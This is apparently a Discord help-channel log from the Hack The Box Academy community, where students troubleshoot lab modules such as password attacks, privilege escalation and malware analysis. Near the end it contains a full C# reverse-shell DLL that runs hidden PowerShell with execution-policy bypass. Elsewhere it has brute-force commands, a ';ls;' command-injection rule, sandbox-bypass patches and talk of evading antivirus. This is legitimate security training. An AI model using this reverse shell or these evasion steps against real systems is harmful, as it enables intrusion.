#modules
No i found it manually using burp 😂
The "right spot"
I only recall the first few "high" vulns being red herrings
As there is one that gets marked "critical" from what i remember
Yep
That's the problem
The zap active scanner is showing some medium and low vulns but the HIGH one is not even found
And yes i waited for it to finish
Btw Thanks for even responding dude
Did you do AJAX scan?
strange, never seen that before, but just hit me too
Same thing, US East was my default. Does not work for US West either, but for CA just like you said.
HTB team aware of that?
I guess no one seen this? lol
You can use whatever you want. Not a bad idea to learn other ways through that module though.
I'd recommend against it, use the tools taught in the module before using tools that make your life easier. Helps you better understand the fundamentals
I mean I understand the fundamentals…. Ligolo would be useless to me as well if I didn't lol
I mean at the end of the day your choice
doesn't really matter which tool you choose to use
Hi, I've lost access to email what I've used to access my account, have other way to recover my account?
There's always something more you learn in the modules though.
Your HTB account? You'd have to reach out to support on the site.
Yes
Hello everyone
Module: Attacking Common Services - Easy
I've gotten the user and pw, and am following the course material to get a webshell. But the output isn't coming up in the browser when I run commands. I've changed the directory in the original command to match what I get from the Webserverinfo file, still nothing. Any hints here would be great.
hey guys how can i exploit a open 80 port?
which module this on?
what?
yeah i am asking for a module
which one specifically?
any module that can exploit port 80
lol
which module/section on htb academy?
if this isn't academy related it doesn't belong here
i did it all wrong write 😂
labs
WHICH LAB?!?
dont yell😣
Here you go: a bunch of modules that exploit port 80 
https://academy.hackthebox.com/exams/2/where-to-start
dog lmao
ok
but don't reveal box info
alr alr
Going through the modules for Windows. It spawned the target without displaying the default credentials. Is there a fix for this?
ended up figuring this one out.
When brute forcing a non-standard port with hydra (e.g. FTP), is this syntax correct? It's correct. hydra -L u.list -P p.list ftp://<IP>:<PORT>
did u try resetting?
Hello
I am doing windows privilege escalation > scf file
I set responder up and i get a hash but its the hash of "htb-student"
How can i get the "SCCM_SVC" user hash?
Thanks in advance
im having a really hard time with the blue team path labs, the windows machines are so slow
https://academy.hackthebox.com/module/103/section/984
Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.
My server isn't listening any request. Anyone have a solution?
Hey guys!
I'm on https://academy.hackthebox.com/module/113/section/1100
I have added ip and vhost entry in the /etc/hosts file. And I'm on VPN but still can't reach.
Things I tried: which did not resolve it (timeout)
- used different region vpn file
- reset the machine and waited 5 mins
- restart the vm and host machine
- used space and tab in the /etc/hosts
- tried sudo for wpscan
- tried curl, wget - with and without sudo
But I can browse the same vhost blog.inlanefreight.local after adding the entry from pwnbox(browser based vm from HTB) without any set backs.
Can someone please help me what I'm doing wrong?
this is my /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
<ip> blog.inlanefreight.local
might also have to add the base domain: inlanefreight.local
also ensure that the pwnbox and vpn aren't running at the same time
so the machine I RDP does not have internet connection, do I really have to transfer the github from my kali via RDP...
Depends on which module, for most of them the tools should already be on the machine
<ip> inlanefreight.local blog.inlanefreight.local
like this?
terminated
I'm on Analyzing Evil With Sysmon & Event Logs and the machine I RDP does not have Sysmon installed
Haven't done that module so I am not familiar with its labs
still not working
and you're connected to the right vpn? you able to ping the ip?
I'm also having a hard time with connecting to a new machine now, target IP is not pinging
yes, I can ping with 0% packet loss
might wanna swap VPNs for both of you, and maybe adjust the MTU, but that's my best guess
I can reach inlanefreight.local on the browser
This is the inlanefreight.local default vhost
tried, still not working
how come pwnbox worked with just and without main domain in it
<ip> blog.inlanefreight.local
https://academy.hackthebox.com/module/110/section/1050
Exercise 2: Try adding a rule that automatically adds ;ls; when we click on Ping, by matching and replace the request body of the Ping request.
Hello. I am trying this exercise. It works but where can I learn regex and is this good?
guys if Im doing the SOC Analyst job role path using a student subscription will getting VIP+ help with the module labs?
like performance wise? Or is VIP+ only for normally HTB and not Academy
I didn't get you. Academy and Labs are 2 different platform.
I see, so buying VIP+ wont help the Academy labs performances right?
What do you mean by performance? Both platforms are independent. Only if you get the yearly plan you have access to both. But student plan only gets you the modules
Oh wait. I don't think you get VIP+ labs even on yearly plans of academy
Yup you don't it seems. Both the subscriptions are different.
so Im just trying to improve the labs in the module, for example I had to RDP into a Windows machine and it was a nightmare, so I was wondering if buying VIP+ could improve the performance but I guess not since HTB and Academy are separate subscriptions
Doesn't work that way
so theres no way to pay for more stable/faster labs in Academy?
Well you can get the Gold subs which have priority, but best performance goes to the enterprise academy which only exists for companies and their employees, they have dedicated servers for those
Is there a link with more info on the labs speed? I would definitely be interested in Gold if they offer more stable/faster labs. I dont see any mention on the billing page of a performance difference between student and gold for example
I personally think it's part of the experience. Like when you are pentesting or bug bounty hunting there's loads of data you probably go through and it takes time. That time compensation is like experience to test your patience.
idk about that, time is money and if the module labs are slow/buggy is just a matter of time before the learner quits and doesnt come back. I see it as an business opportunity, offer high performance on the Academy labs in the high subscriptions
Module labs/assessments are very fast. I have never encountered a slow response
does the Gold subscription actually provide faster and more stable labs? "Priority" I dont see any mention on the billing page, I will be very interested in upgrading if so
Gold subscription offers alternative VPNs which would provide more isolation hence, better performance. That being said: gotta deal with it, as for RDP, using TCP VPN might be better.
awesome thank you!
For any issues you experience with the VPN and the connectivity, it is best to reach out to support for better troubleshooting
Can someone help me with Prototype Pollution RCE (Whitebox Attacks), I am trying to follow the steps but the command injection is never executed in the provided application. Also in the debug console log I dont see this:
But only this:
anyone here solved planning machine im stuck help me
Even when I clear it and set the command in Debug console, it is never executed and here is the correct Debug Console image:
That section is basically a walkthrough. You pass the $Cred variable as -Credential parameter in the following commands and that uses this context for authentication instead of the local user.
but 'whoami' doesn't change
Also tried with the 'constructor' to bypass "__proto__" still no luck, Can I DM someone for support?
Yes, because the credentials are only valid to authenticate via the network and whoami uses the local context. This is intended.
Ah okay, thanks a lot
Hey there, has anyone worked on the "Introduction to Splunk & SPL" Module, I would love some help!
Can anyone point me in the direction for getting Havoc beacon via xp_cmdshell? Done it in the past using Powershell payload but Havoc doesn't support this afaik
hi everyone. im stuck at AD Enum& Attacks module DCSync section. i cant ssh into the linux host as it says during the section (i got wrong creds error). can someone help me?
I've usually just use mssqlclient to use xp_cmdshell to do command things, which includes moving and executing files, that included Havoc beacons.
Thanks, AV is removing the Havoc .exe, might try obfuscate that, I have some shellcode loading via .dll which isn't detected, so was trying to use that same shellcode
Gotcha
I have a question regarding SMTP user enumeration, it seems like the "smtp-enum-users" cannot identify the correct users if a user list is provided.
has anyone else faced this issue?
For instance, smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t <ip>
won't give any valid user even if the valid user is in the user.list
There's more than RCPT
VRFY for instance, exists
And depending how it's set up; you may need a domain
I tried all three, also the module solution did the same thing I did and it did get the user
interesting thing is that if we specify the direct user instead of a list, -u <user>, then it does indeed detect that user as valid
Try messing around with the timing
I believe it's -w or -W (been a minute)
It could be that the tool is going too fast and not waiting on the response
yeah I played around with the timing the issue still persists, even on the attack box
did you try setting the timeout to 20+ seconds?
you can also try the metasploit one or the nmap script
i just did it myself, set timeout to 25 seconds, and it came back
<ip>: <username> exists
I tried 50 and 100 too same thing, thanks though
I'll look into it.
i used the provided footprinting-wordlist
i'm assuming you're referring to the footprinting: smtp section yeah?
yeah I used the wordlist provided in the resources tab, to be exact I am doing in the easy lab of Attacking Common Services.
I just restarted the machine and the issue just got resolved.
kinda weird
@zinc halo don't reveal information about a skill assessment; the short answer is - logical thinking
why is it password protected
can it be reused
try reusing it
okie, yah that make sense i guess, thanks!
i did not know it could be reused like that but good to know now! thanks!
it can be; doesn't mean it should be :) best practices
ah.. i seee
but consider that the user is a sysadmin or some such role and should have those types of rights/access so best practice is
- limiting access to root user ✅
however - reusing a credential ❎
this happens in the real world too
humans are lazy
I wonder if such issue pops up in exam
oh yah that make sense i was just wondering how it could be reused like that then i found out you could place that certain file in a certain folder for it to be reused, thanks!! this is really helpful
when do I know to reset a machine
if you feel you've exhausted all available options and that you're 100% sure what you're doing is right
if you're unsure the env is broken, you'll have to reach out to support
but you can reset the environment unlimited times
understood
Hi there, I'm on Windows Priv Esc > Further Credential Theft.
Been stuck on flag two for the last little while, I used Lazagne on user jordan to find the first flag, I now have RDP access into a higher privileged user, still not getting much for flag two. I've tried everything in this module, couldn't find any PuTTy Sessions, nothing in SessionGopher etc... Would love a hint if anyone could help thanks.
Hello
I’m new at ethical hacking
I want be a good hacker or coder
But i don’t know much
Like ik html a bit and a bit python
Can anyone teach me how can i be a good hacker please
hi
Nobody will teach you for free, we ALL pay for it. So can you
i cant get my RDC to connect to the target system it says server not enabled computer is turned off not available on the net work
do i need to have the vpn turned on first?
Yes you need to be connected to the VPN
ok thank you
hi
Download VPN connection,
sudo openvpn academy-vpn.ovpn
so i shouldn't connect with my personal pc?
you should be connecting with whatever machine you're using to do the content with
I highly recommend looking at "Setting Up" module, it will help/guide you into recreating a Virtual Machine for you to use
i.e. if you're using a VM; you connect in the VM, not on the Host
ok i will just stick with the vm that is for use
Yes, the pwnbox is just as good 🙂
The VM that's available to you does NOT require you to setup VPN. It's already configured, you only need to configure if you're using your own machine
Hi guys.. I need help
I’m in public exploits (just getting started) section and I’m doing the challenge
I know how to exploit the vulnerable plugin with metasploit but it’s not working.
It does not output what I want.
I have tried exploit db python script and it’s the same issue.
I looked in the specific code to get the exact url I need to exploit the vulnerability but the request is timed out and doesn’t return anything.
Did anyone encounter this problem?
I’m stuck on the pass the hash section I’m trying to get the reverse shell from DC01 I’ve used to the reverse shell command and it says command executed but I’m not getting a connection on my nc listener
iirc all you need to do is visit the webpage and it tells you all the info you need to get the info
you have to make sure with the exploit you specify the RHOST and RPORT
RHOST - Remote Host IP
RPORT - Remote Port
I have done that.. it shows success but it doesn’t output or show the file content
I’m running ps as admin and used mimikatz for the user Julio any hints to a step I’ve might missed
well generally speaking it's not gonna show the file content, it should tell you where it saved the file to, if you're using the right exploit
did you try running the command in cmd instead of powershell?
I did not
if it's the portion i'm thinking; whenever there's a black background, the command is expected to be run in cmd; blue is ps
Hey, Guys I am stuck at this question: Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. ..... under the password attacks pass the hash module. I have authenticated as David user with the hash but still it's giving not enough rights
@north bramble please don't share passwords -_-
sorry.
proxychains is only if you're pivoting using a tool that may utilize it, i.e. using socks4/5 protocol
Hi people!
I'm currently unable to work on a final skill assessment. As soon as I log in using the credentials provided for the exercise, I get kicked out immediately. The system shows the following message:
"Connection reset by peer client_loop: send disconnect: Broken pipe"
Could someone please assist me with this issue?
Module: Linux Privilege Escalation
Page: Linux Local Privilege Escalation - Skill Assessment
any idea why it isnt working?
Hi, try every VPN file until it works. I'm sorry it's the only solution I've been given
no idea
What module >lesson?
Hi, did you use Mimikatz to use David's hash in privilege debug mode?
Thanks Matthew99, I will try that
Goodluck, I had a nightmare with that myself. 4th VPN I finally got no broken pipes
also used psexec but yea still permission error even when I am authenticated as david with admin
Vans, can I dm?
sure
I still can’t get the reverse shell when I try to run the commands in black (cmd) at the top of it it says it’s in powershell but it’s in black
Anyone know if GodPotato is patched? Trying it on Win11 and WinServer2019 and get this error
[*] CurrentUser: NT AUTHORITY\SYSTEM
[!] Cannot create process Win32Error:2
sometimes the captions are wrong
what does that have to do with academy modules?
It's in one of the modules
ok but are you doing it on a module, or no -- that's the key distinction :)
I'm working through the module and testing it on my VMs
I'm asking if it's patched since it works in the module but not on my VMs
if it works on the module i wouldn't really be concerned. ¯_(ツ)_/¯
it's likely just a minor thing
testing on your own vm != doing it within the module
huh, it's an academy for learning... ?
if it's working on the module, and not on your own vm => the question belongs in a different channel
i.e. #red-team or something like that
can someone help with active directory dcsync section. There are two ip's given at the end of the subject assessment.. I can rdp into one but what is the other for ? I tried to ssh to it w/ adunn and htb-student creds and I cant. Help would be appreciated.
thanks
is it something like ea-attack01 or ea-parr01 r something like that?
i can't see the Windows taskbar when connecting to the VM that you gave us access to if i hit my windows key it pops open my windows also is that something i am just going to have to deal with?
the credentials are given in like the setup section of the module
yup, first box is ACADEMY-EA-MS01, second box is ACADEMY-EA-ATTACK01
/dynamic-resolution then resize the screen with xfreerdp
thank you
there's a section that gives you credentials for the attack box
Hey guys i want to use any good browser but what browser should i do people says fire fox is good but others says duck go duck is good which one
firefox is fine, so is ddg, it's just personal preference really
ughh quick question, do I type that command in bash ?
it's part of the xfreerdp command
thank you
for being such a helpful person 😄
i would have figured that out if i just use man xfreerdp sorry >.>
another nifty thing that plenty of us use with xfreerdp is the /drive: option :)
ill have to google that because im not understanding the 2nd part of the description
that latest version of xfreerdp is xfreerdp3 in case you guys run into STDERR
plus i would really love some mentorship from the senior hackers , i have completed the windows and linux fundamentals now should i complete this module or should i go into another module since i'm not really looking to be an android pentester this summer. What should i do?
@craggy urchin Thank you !
Hi there, for one of the module, i got a valid username and password for rdp, but crowbar doesnt seem to see it as a valid credentials when i try to bruteforce the rdp using that exact username and password, any idea why that would be the case? thank you!!
did you check the wordlist for any blank spaces?
what command did you use?
crowbar -b rdp -s xx.xx.xx.xx/32 -u username -C test.list
if you have the target ip address why use the entire subnet?
the only thing i could think of, is when i install crowbar it was asking for xfreerdp but i am using xfreerdp3 so i created a symlink for them
try it with the target ip address rather than bruteforcing the entire subnet mask
im not tho? isnt /32 the one ip for that target tho
no
no?
nope 🙂
why are you doing /32? at all
it should work without a cidr
check the tool's help page
and find out the argument that can be solely used for targeting the singular ip address
looking into it; it looks like /32 is intended for single ips with crowbar
i got it from the kali tool page https://www.kali.org/tools/crowbar/
crowbar Usage Examples
Brute force the RDP service on a single host with a specified username and wordlist, using 1 thread.
root@kali:~# crowbar -b rdp -s 192.168.86.61/32 -u victim -C /root/words.txt -n 1
2017-10-10 14:59:55 START
2017-10-10 14:59:55 Crowbar v0.3.5-dev
2017-10-10 14:59:55 Trying 192.168.86.61:3389
2017-10-10 15:00:08 RDP-SUCCES...
and -p is for specifying a port
though i personally didn't use crowbar for bruteforcing rdp; i used hydra
yah i tried hydra it is taking forever for me thats why i saw it on the forum to try crowbar 😦 but for some reasons it doesnt wanna work
@zinc halo does the list for credentials solely specifies passwords or the usernames too?
the official github repo https://github.com/galkan/crowbar
only one password
and the valid one as well
if it's one password you can just use -c 'password'
true ill try that as well one sec
it also helps if you say what module you're working on
nope doesnt wanna work 😦
instead of just saying "in one of the modules"
i was trying not to spoil it
dude, fr
password attacks lab - hard
the spoiling is if you specifically say what the password/username is
or if you reveal the password in a screenshot, or a flag, etc
i assume this is for the first question? how did you determine that the password is, in fact, correct, have you tried other tools besides crowbar?
yah i got it from hydra, and it worked for rdp but i thought i wanna try it to see if crowbar is indeed faster but
could also be that it's timing out before crowbar gets a response
it doesn't seem to wanna work
@zinc halo try removing the subnet and use the -s command e:g -s <targetip>
zaarc
respectfully
looking into it; the /32 is required for single ips
let me try that
@fathom pendant yes i'm looking at the man page but i found the static target option
-s is literally the option they're using
@fathom pendant sorry didn't focus on the keyword arg there
also as a note @zinc halo you can use 10.129.x.x for the outward facing ips for private targets, that's not really a hidden fact
yah increasing -t does not work either 😦
Hi everyone, I'm doing skill assessment part 1 from login bruteforcing from CBBH, and if you are wondering yes, I'm using the given username and password list but will these even take lot of time to crack?, It is at least showing me 3h to crack using hydra
okie
estimated time != actual time
ohh okay but at least it seems to me that it will take a lot time to go through the list.
just have patience
sure !
as a note: always start with the wordlists given
then branch out
use wordlists that the module may have mentioned
as a LAST resort use rockyou
yeah, I'm using the given wordlists,and also if the skill assessment have given specific wordlists to use i don't think i would ever need to use other wordlists right?
generally speaking if the skill assessment tells you to use a specific wordlist, download/use that wordlist
I will thanks for it .
i just realized my mistake why it was taking a lot of time, when i downloaded the username and password list, wget downloaded the html page instead and i was using that all this time and was wondering why this is taking so long, dang it!
I again downloaded it properly and it was an instant finding
Oof
hi
i have a question
i m doing a machine in htb named planning
the ssh port is open
If I'm able to find credentials for modules ahead of what I'm learning, does that mean I'm probably going too out-of-scope with my lessons?
when i do and put the pass it says wrong pass
ok
Nah I'd say you're kinda working your own methodology, instead of jumping back and forth. I found the thing for the protected archives section way ahead of the section, for instance
Also you mean sections, not modules
Modules are the learning units, sections are the chapters within the units
Thank you btw, my dictionary needed that lol
And yeah I totally getcha, When I get stuck I'm using the other content to try to get ahead without having to look back at questions, getting answers for things I shouldn't be getting yet lol
I think in one of the modules I captured like all the hashes lol instead of going back and forth
Does anyone know if "+clipboard" with xfreerdp can copy/paste files? I've been trying to learn an easier way to transfer files from target to attack machine
lol yea i can def relate to that
Yes +clipboard enables clipboard, though usually it should be enabled. +clipboard allows for easier copy/paste
how come you never went for CPTS Marcie? Idk if you've been asked a million times but I seen ya here when I first joined and shocked you havent got certs
Xfreerdp has the /drive: option though for mounting a local directory to the session
I've said time and again the reason currently for not having it
I really don't feel like answering it a million times
You didn't have to explain it sorry lol
But thanks for the insights on clipboard/freerdp I'll give that a shot. Sorry to disturb, take care & have a lovely day
Hi everyone,
I have a little question about one optional exercise in the module "Cracking Passwords with Hashcat" in the section "Cracking Common Hashes" the optional exercise about ntlmv2 and ntlm i still don't get how i'm supposed to get to the answer.
I hope someone can give me a clue.
Thanks for the help
Does HTB want me to follow and execute the steps they do/talk about on my "own" VM: Pwnbox? i'm just clueless that why i wonder. thanks in advance!
Hey guys, module: Introduction to Malware Analysis section: Dynamic analysis, when Im stopping Noriben, It don't want to save the logs from procmon? ANy Idea?
Help, I’m stuck on the medium level for the enumeration with Nmap lab
Also just for another point of view, how can I get info on how other people solved the easy lab
If it's the module called Network Enumeration with Nmap, DM me. 🙂
If not that one, haven't done it yet 😄 It's a part of the basic toolset
Yes, the spawned target is a replica of the nibbles machine - and this is detailed steps on how to root it
You can look up the hashcat example hashes for the list of hash modes
If someone else needs a hint for it, nmap uses TCP to probe, can we try something else?
Okay with that i know i have ntlm hashes from a ntds.dit dump and a ntlmv2 hash from a responder and i also check the answer of the exercise but i don't understand the link with the ntlm hash of the user.
Look up ntlm and windows
Ntlm hash of the user is in very basic terms the password hash of the user
Okay i see that now but how could i have achieved this result with what they teach us in the module, apart from doing random things until i found something ?
Google is powerful, and you can expand the info beyond strictly what's taught
Okay i'll continue to search thanks for ur help and have a great day.
anyone else having difficulties connecting to targets?
Hi - On Getting started - Service Scanning- How am I supposed to find bob's password to connect to SMB for the last question?
Works for me, but VPN seems to be slower than usual 🙂
Share the link for the task, might have it solved, think I remember a bob
Read the section carefully
His pw is in the reading
reading carefully often leads me to the answers across many modules 😛
Im doing Pass the Ticket (PtT) from Windows within the Password Attacks module but I can't seem to export the tickets no matter what I try.
reach out to instagram's support, we can't help
Are you using an elevated cmd prompt/PS session?
You can DM your command and outputs if you'd like.
Thanks!
Evening I have been struggling with the following question for the past couple days now:
Reproduce all the debugging procedures mentioned in this section and provide the hidden shellcode-related hex values from the final screenshot as your answer. Remove all spaces.
In the walkthrough, the following changes are to be made to avoid triggering "Sandbox Detected"
1st change: cmp dword ptr ss:[rsp+0x30], 0x1 to cmp dword ptr ss:[rsp+0x30], 0x0
2nd change: je shell.402F09 to jne shell.402F09.
3rd change : jne shell.402CD0 -> Changed it jmp shell.402CD0
I'm still getting a sandbox detection
Introduction to Malware analysis Debugging section
it should go without saying to not visit that discord link that was posted if you saw it
How long is MailSniper.Get-GlobalAddressList supposed to take? What does it mean by "This may take a while"? Forever? Been waiting at least an hour for it to run.
(MSSQL, Exchange, and SCCM Attacks § Exchange § Enumeration)
that's not what this server is about
Oooo
i don't advise on admitting to illegal activity :)
Sorry for misunderstanding, i was just worried because i’m trying help people for not get scammed
read #welcome to see what this server is actually about
that's great and all; but this server isn't about hacking scammers
I won’t do this mistake anymore, hope you forgive my mistake for what i did.
Hey why is my name owen mc verify?
Who did that??
Read #welcome
Oke
because your username contained characters outside the latin standard alphabet, so it was changed so that we can more easily @ or ping you if necessary, or issue other actions behind the scenes
DAYMMMMMM
IM TRYIN CREATE HACK THE BOX ACC
I PUT NAME LAST NAME AND THINGS IT SAYS ITS TAKEN
bro i’m stressed i been 1 hour trying
then i guess be more creative with your username idk what to tell you
¯_(ツ)_/¯
Even my cat is confused🤣
Anyways
Can you js do any other name not owen mcVerify 🥲
the robot overlords
also this is all irrelevant to the channel topic
so i'm gonna put an end to the convo here
Aah alright
if you're having issues coming up with a username for HTB; idk use a random name generator or something
I’m going sleep Marcie, God bless you
Alr bet💪🏻
mashallah
Yoo ya muslim(?
no; also irrelevant
gonna bump this for you
Hi can someone help me with the HTTP Attacks Log Injection I can t figure the way to get an RCE
the linux privesc assement is currently unplayable
it kicks me out of ssh after about 5 seconds, and i get other ppls history when i use that command
guys what results should I trust for find command results: ssh from your machine or HTB pwnbox? They seem to show different results for similarly worded find command? Why is this even happening? I thought all target machines are the same? I see more results in pwnbox than ssh method.
pwnbox is NOT the target; running find in the pwnbox environment is just checking the pwnbox, unless i'm misunderstanding
Correction: i used bash in pwnbox
that doesn't clarify anything
are you ssh into the target from pwnbox; or running the find command in pwnbox
Okay let me clarify
I was doing the Linux Fundamentals: Find Files and Directories. I did the the command find / -name *.conf 2>/dev/null
first on my machine ssh to target machine using terminal
yeah what in the world im sshing into the same machine, and when i ssh into it once I see nothing, a normal setup. but i ssh into it again and i see someone elses history they tried to use for this machine before I get disconnected
then i did the same thing to bash in pwn box
I tried switching servers but I'm on the 3d us server and the same issue is happening
I get a different list
different list of files.
the bash results from pwnbox on find command is way more extensive than ssh to the target machine.
bash in pwnbox is not the same as the environment of the target
the pwnbox is its own attack machine, independent of the target spawns
you'd still need to ssh to the target from it to perform the tasks
Ahh I see.
so yes: the pwnbox will have a different list than the ssh to the target... because the pwnbox is NOT the target
as i said prior
pwnbox => attack box alternative to using your own vm
target => the thing you attack/connect to to perform the tasks (if required) by the section
Got it. That makes sense now.
Thanks
note: you should not be using the pwnbox and your own vm at the same time when attacking targets, due to how the vpn packs are handled - the Internal IP provided (tun0 ip) is hardcoded into your vpn pack, and the pwnbox utilizes this same pack (automatically on startup) to connect so you get 2 devices with the same IP on the same network... (not good)
That probably explains why my machine slows down or even hangs when i do that.
I will avoid that next time.
Why does WSL curl keep timing out on the section of MSSQL, Exchange, and SCCM Attacks dealing with Exchange version enumeration?
Serious question here for anyone who has been studying for a while… did you ever hit a point where you lost all energy for this? Near the end of April I got sick and I haven’t been able to get myself to do anything on htb since. I’ve never felt a burnout like this in my life. It’s like all the joy I got out of this is gone
1/3 of the way through the pen testing path
Gotta find that spark again.
take a break; let your mind rest; don't force the issue
do things unrelated to htb
maybe some coding projects
you'll get back to it when you're ready, but forcing yourself when you really don't want to do it is just gonna make the feeling worse
Hey! excuse me, i am getting a lot of broken pipe when connecting with SSH
is anyone noticing a similar thing?
If it's the linux privilege escalation lab then it's a known issue
Otherwise try changing your VPN interface MTU
it's more like file transfer
probably, i will check that!
This isn’t related, but, how come I can’t talk in general chat and stuff?
ehhh my name just means red in japanese
They combined the accounts some time ago, should be the same account now
Oh really? damn noice
one account to rule them all
ahhhh i really couldn't get the code because of the broken pipe issue, i changed the VPN server too
https://www.ibm.com/support/pages/how-do-you-change-mtu-value-linux-and-windows-operating-systems
as I mentioned before: try adjusting the MTU
How do you change the MTU value on the Linux and Windows operating systems?
This is not that kind of server we don't allow any services like that here
Oh sorry
Attacking Authentication Mechanisms module's "Attacking the Signing Secret" section, I cracked the JWT token and forged the token with the secret key and changed the isAdmin to true, but the server won't accept it. It says "Token is Invalid".
I believe I am doing every step right, but I've hit the wall. Was anyone in the same situation before? If so, can I get a hint on how you solve it?
I started up the CPTS path in September 2024, I’m now finally just about getting it finished with a solid half year break.
For someone with no prior experience - The burn out came so hard after about 35-40% so honestly I’d just say it’s normal man. Take the break you need, and trust me if it’s meant to be you’ll come back
i have felt burnout at several modules and last week too but the thing i did was when i am feeling burnt out i went out with family or friends, spent a day or two with them and after that i felt way more energized and in a better mindset than before
hello
Reminder that even if you use spoiler text: posting spoilers is still not allowed -_-
Sorry, I tried not giving too much away but wasn't sure exactly how to explain the steps I had taken so far without some of that key info... Any tips on how to better provide context without rule breaking?
Yes, just ask for help with module X and section Y. Discuss the rest in dm
That's fair, I did a search and tried to organize my ask as others did. I'll keep that in mind, sorry guys!
No worries at all
But did you get the answer you need? I can have a look when I get on my pc in an hour
Yeah I solved it on my own and added an edit to the end of it.
Okay 👌
so... PHP just kinda is a web shell, huh?
It's a programming language that can use functions to act as a webshell
Python Library Hijacking (Linux privESC)
when trying to follow along with example (as the question said)
getting this
i do have the privs to run it as root tho without password
@blazing loom I know Getting Started is tier 0, but still please don't give solutions to the challenges.
Ah no problem. I figured since it was already in several other messages in this channel that it was already spoiled. But I'll refrain in the future regardless.
currently doing linux priv esc skills assess and when connecting via ssh i get instantly disconnected. anyone had this issue?
did you only put the target ip address inside the resolvers.txt
still need assistance
he means, did you make sure that all the other resolvers are commented out?
only ip in the file?
hi im doing the information gathering web edition,
on the skills assessment using recon spider
python3 ReconSpider.py http://<subdomain>.inlanefreight.htb:<port>
doesnt work for me, ive correctly found it with gobuster but reconspider just refuses to work
added subdomain in /etc/hosts?
yup checked both of these
Any ideas
the skills assessment
anybody can guide me on android fundamentals module how to set up the testing environments?
yea it does, just did it, theres content in the results.json
This is not the way... you only have sudo access to run the binary not to set environment variables 😉
yea i did the binary way but then why does the question said try every thing mentioned in module 😭
are they trolling ?
damn.. thanks man that helped a lot
Yeah is a lil troll 
I guess they meant to try and see if it works
nono its fr, i kept thinking the first subdomain was correct but i just needed to enum more
Anybody else have issues with ssh on academy? Trying to ssh in on linux file transfer methods but keep getting broken pipe and get disconnected.
htb-student@nix04:~$ gunzip Read from remote host 10.129.227.45: Connection reset by peer
Connection to 10.129.227.45 closed.
client_loop: send disconnect: Broken pipe
Didn't have time to complete the command 🙂
Tried both vpn and pwnbox.
also, why is there a diff between HTB recon spider and kali's reconspider, is there no where else i can get HTB's version
Ok, I'll try that thanks 🙂
I’m having the same problem
On Linux priv esc
same issue right now
Didn't work changing VPN and looks like a few others have same problem.
Yah! Thanks for taking your time
hey, i am doing the SQLMAP essential module and I try to input flag5 content as the answer but for some reason it's not working, any advice?
can anyone help me i am not getting reverse shell back in password attacks pass the hash question
i feel like i am doing everything correct it also say executed but i dont get shell
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
My english is weak or I'm not getting this. From the module Broken auth CBBH, this phrase is worded so weirdly i can't seem to understand what it is trying to tell me.
Seems straightforward to me
Windows Evasion > LOLBAS: RunDll32
For some reason I keep getting this error when attempting to run my Dllmain function Missing entry: Dllmain
I did install the NuGet DLL Export Package and compiled with Release ANY,x64,x86, I did NOT get prompted to Reload All
```
using System;
using System.IO;
using System.Net.Sockets;
using System.Diagnostics;

namespace RShell_D
{
    internal class Program
    {
        private static StreamWriter streamWriter; // Needs to be global so that HandleDataReceived() can access it

        [DllExport("DllMain")]
        public static void DllMain()
        {
            try
            {
                // Connect to <IP> on <Port>/TCP
                TcpClient client = new TcpClient();
                client.Connect("<REDACTED-IP>",1010);

                // Set up input/output streams
                Stream stream = client.GetStream();
                StreamReader streamReader = new StreamReader(stream);
                streamWriter = new StreamWriter(stream);

                // Define a hidden PowerShell (-ep bypass -nologo) process with STDOUT/ERR/IN all redirected
                Process p = new Process();
                p.StartInfo.FileName = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe";
                p.StartInfo.Arguments = "-ep bypass -nologo";
                p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardError = true;
                p.StartInfo.RedirectStandardInput = true;
                p.OutputDataReceived += new DataReceivedEventHandler(HandleDataReceived);
                p.ErrorDataReceived += new DataReceivedEventHandler(HandleDataReceived);

                // Start process and begin reading output
                p.Start();
                p.BeginOutputReadLine();
                p.BeginErrorReadLine();

                // Re-route user-input to STDIN of the PowerShell process
                // If we see the user sent "exit", we can stop
                string userInput = "";
                while (!userInput.Equals("exit"))
                {
                    userInput = streamReader.ReadLine();
                    p.StandardInput.WriteLine(userInput);
                }

                // Wait for PowerShell to exit (based on user-inputted exit), and close the process
                p.WaitForExit();
                client.Close();
            }
            catch (Exception) { }
            // CODE EXECUTION
        }
    }
}
```
Hey
Hi there !
Can someone tell me that, in this server will we learn hacking with kali linux ?
You can use whichever distro you like
I am working on 'Whitebox Attacks - User Enumeration via Response Timing', but cannot manage to work with the time response, I know if the user does not exist then the response time is 27 or 28 milliseconds, but if the user does exist it is sometimes 1,027 and sometimes between 200 and 500 milliseconds. So how to enumerate the usernames?
put the module name in your message so people can help you more easily
hey guys i need help. i just completed the footprinting module lab, i completed the hard lab then i went back to the easy lab for practice, just to find out i can not remember the methodology i used to get the flag 
how can i make this stick 
Don't worry, you can always come back to it
But practice makes perfect
make writeups for every question in the module
obv dont publish them, keep them as a reference
Though my issue is when I lock in I forget to write it down 
-# Have half a writeup for Attacking Thick Clients cos of it 
Hi, I have a problem with the Web Service and API attacks module in the skill assessment section:
No matter what I do either there's no password field or I can't get any info relating to the skill assessment db
Any help would be appreciated 🙂
Replace the resolvers.txt with a file that contains the target ip
No.
Resolvers.txt is a list of public dns servers. For, what i hope should be obvious reasons, those public servers can't reach a private target
It could also be some other weird error, but that you'd have to raise the issue on the subbrute gh page
I mean my only other thing is making sure you're in the same directory as your files
¯_(ツ)_/¯
with sshuttle, can I not ping internal hosts because it's TCP only?
